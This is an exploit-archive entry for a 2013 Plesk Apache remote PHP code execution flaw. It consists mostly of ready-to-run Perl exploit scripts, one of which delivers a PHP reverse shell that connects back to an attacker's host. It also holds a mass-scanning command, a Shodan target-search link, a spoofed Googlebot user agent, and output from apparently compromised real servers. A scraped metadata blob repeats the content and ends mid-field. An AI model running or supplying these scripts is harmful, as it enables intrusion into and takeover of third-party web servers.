ID 1337DAY-ID-20857
Type zdt
Reporter Kingcope
Modified 2013-06-06T00:00:00
Description
Exploit for php platform in category remote exploits
Plesk Apache zeroday / June 2013
discovered & exploited by kingcope
this Plesk configuration setting makes it possible:
scriptAlias /phppath/ "/usr/bin/"
Furthermore this is not cve-2012-1823 because the php interpreter is called directly.
(no php file is called)
Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution
Affected and tested: Plesk 9.5.4
Plesk 9.3
Plesk 9.2
Plesk 9.0
Plesk 8.6
Discovered & Exploited by Kingcope / June 2013
Affected and tested OS: RedHat, CentOS, Fedora
Affected and tested Platforms: Linux i386, Linux x86_64
Untested OS: Windows (php.exe?)
Unaffected: 11.0.9 due to compiled in protection of PHP version
Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%
6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%
62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%
3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Shodanhq overview of Plesk on Linux:
http://www.shodanhq.com/search?q=plesklin
perl plesk-simple.pl <ip address>
...
...
...
OK
Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24
19:50:48 MSD 2012 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
---
./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80
perl plesk-simple.pl 76.12.81.206
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 13:39:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
77
Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E
ST 2012 x86_64 x86_64 x86_64 GNU/Linux
3e
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
0
perl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2013 15:29:28 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
3
OK
60
Linux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux
4c
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)
0
use IO::Socket;
use URI::Escape;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
use IO::Socket::SSL;
use URI::Escape;
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple-ssl.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket::SSL;
use URI::Escape;
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use URI::Escape;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
while(<$sock>) {
print;
}
###############################################################################################################
plesk.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use IO::Socket::SSL;
use URI::Escape;
sub usage {
print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit;
}
if (!defined($ARGV[3])){usage();}
$target=$ARGV[0];
$proto=$ARGV[1];
if ($proto eq "http") {
$sock = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
}elsif ($proto eq "https") {
$sock = IO::Socket::SSL->new(
PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
}else {usage();}
$lip=$ARGV[2];
$lport=$ARGV[3];
$pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip =
'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;
\$error_a = null; \$shell = '/bin/sh -i'; \$daemon =
0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
printit(\"WARNING: Failed to daemonise. This is quite common and not
fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port,
\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 =>
array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process =
proc_open(\$shell, \$descriptorspec, \$pipes);if
(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
exit(1);}stream_set_blocking(\$pipes[0],
0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2],
0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) {
printit(\"done.\"); break;} if
(feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1],
\$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a,
\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
printit(\"SOCK READ\");\$input = fread(\$sock,
\$chunk_size);if(\$debug) printit(\"SOCK:
\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1],
\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT:
\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2],
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
\$input\");fwrite(\$sock,
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print
\"\$string\n\";}}
?>";
$arguments=uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
$path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377");
print $sock "POST /$path?$arguments HTTP/1.1\r\n".
"Host: $ARGV[0]\r\n".
"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n".
"Content-Type: text/plain\r\n".
"Content-Length: ". length($pwn) ."\r\n\r\n". $pwn;
while(<$sock>){print $_;};
###############################################################################################################
# 0day.today [2018-03-17] #
{"published": "2013-06-06T00:00:00", "id": "1337DAY-ID-20857", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:39:46", "bulletin": {"published": "2013-06-06T00:00:00", "id": "1337DAY-ID-20857", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.5, "modified": "2016-04-19T23:39:46"}}, "hash": "754f23d15b9c170a5d5203d44a8238e85727938154fb75f0e99ecaaee9512afc", "description": "Exploit for php platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-19T23:39:46", "edition": 1, "title": "Plesk Apache Zeroday Remote Exploit", "href": "http://0day.today/exploit/description/20857", "modified": "2013-06-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/20857", "references": [], "reporter": "Kingcope", "sourceData": "Plesk Apache zeroday / June 2013\r\ndiscovered & exploited by kingcope\r\n \r\n \r\nthis Plesk configuration setting makes it possible:\r\nscriptAlias /phppath/ \"/usr/bin/\"\r\nFurthermore this is not cve-2012-1823 because the php interpreter is called directly.\r\n(no php file is called)\r\n \r\nParallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution\r\nAffected and tested: Plesk 9.5.4\r\n Plesk 9.3\r\n Plesk 9.2\r\n Plesk 9.0\r\n Plesk 8.6\r\nDiscovered & Exploited by Kingcope / June 2013\r\nAffected and tested OS: RedHat, CentOS, Fedora\r\nAffected and tested Platforms: Linux i386, Linux x86_64\r\nUntested OS: Windows (php.exe?)\r\nUnaffected: 11.0.9 due to compiled in protection of PHP version\r\nTraces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] \"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%\r\n6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%\r\n62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%\r\n3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\" 200 203 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\r\nShodanhq overview of Plesk on Linux:\r\nhttp://www.shodanhq.com/search?q=plesklin\r\n \r\nperl plesk-simple.pl <ip address>\r\n...\r\n...\r\n...\r\nOK\r\nLinux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24\r\n 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n---\r\n./pnscan -w\"GET /phppath/php HTTP/1.0\\r\\n\\r\\n\" -r \"500 Internal\" 76.12.54.163/16 80\r\nperl plesk-simple.pl 76.12.81.206\r\nHTTP/1.1 200 OK\r\nDate: Sat, 16 Mar 2013 13:39:35 GMT\r\nServer: Apache/2.2.3 (CentOS)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n77\r\nLinux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E\r\nST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n3e\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n \r\n0\r\n \r\nperl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Mar 2013 15:29:28 GMT\r\nServer: Apache/2.0.54 (Fedora)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n3\r\nOK\r\n \r\n60\r\nLinux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux\r\n \r\n4c\r\nuid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)\r\n \r\n0\r\n \r\n \r\n \r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n###############################################################################################################\r\n \r\nplesk-simple-ssl.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\" \r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk-simple.pl\r\n \r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\nsub usage {\r\n print \"usage: $0 <target> <http/https> <local_ip> <local_port>\\n\";exit;\r\n}\r\nif (!defined($ARGV[3])){usage();}\r\n$target=$ARGV[0];\r\n$proto=$ARGV[1];\r\nif ($proto eq \"http\") {\r\n$sock = IO::Socket::INET->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n}elsif ($proto eq \"https\") {\r\n$sock = IO::Socket::SSL->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n}else {usage();}\r\n$lip=$ARGV[2];\r\n$lport=$ARGV[3];\r\n$pwn=\"<?php echo \\\"Content-Type: text/plain\\r\\n\\r\\n\\\";set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip =\r\n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null;\r\n\\$error_a = null; \\$shell = '/bin/sh -i'; \\$daemon =\r\n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid =\r\npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\");\r\nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) {\r\nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else {\r\nprintit(\\\"WARNING: Failed to daemonise. This is quite common and not\r\nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port,\r\n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\");\r\nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 =>\r\narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process =\r\nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if\r\n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\");\r\nexit(1);}stream_set_blocking(\\$pipes[0],\r\n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2],\r\n0);stream_set_blocking(\\$sock, 0);while (1) { if (feof(\\$sock)) {\r\nprintit(\\\"done.\\\"); break;} if\r\n(feof(\\$pipes[1])) {printit(\\\"done.\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1],\r\n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a,\r\n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug)\r\nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock,\r\n\\$chunk_size);if(\\$debug) printit(\\\"SOCK:\r\n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input =\r\nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT:\r\n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input =\r\nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR:\r\n\\$input\\\");fwrite(\\$sock,\r\n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print\r\n\\\"\\$string\\n\\\";}}\r\n?>\";\r\n$arguments=uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path=uri_escape(\"phppath\",\"\\0-\\377\"). \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\".\r\n \"Host: $ARGV[0]\\r\\n\".\r\n \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\".\r\n \"Content-Type: text/plain\\r\\n\".\r\n \"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\". $pwn;\r\nwhile(<$sock>){print $_;};\r\n \r\n \r\n###############################################################################################################\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": 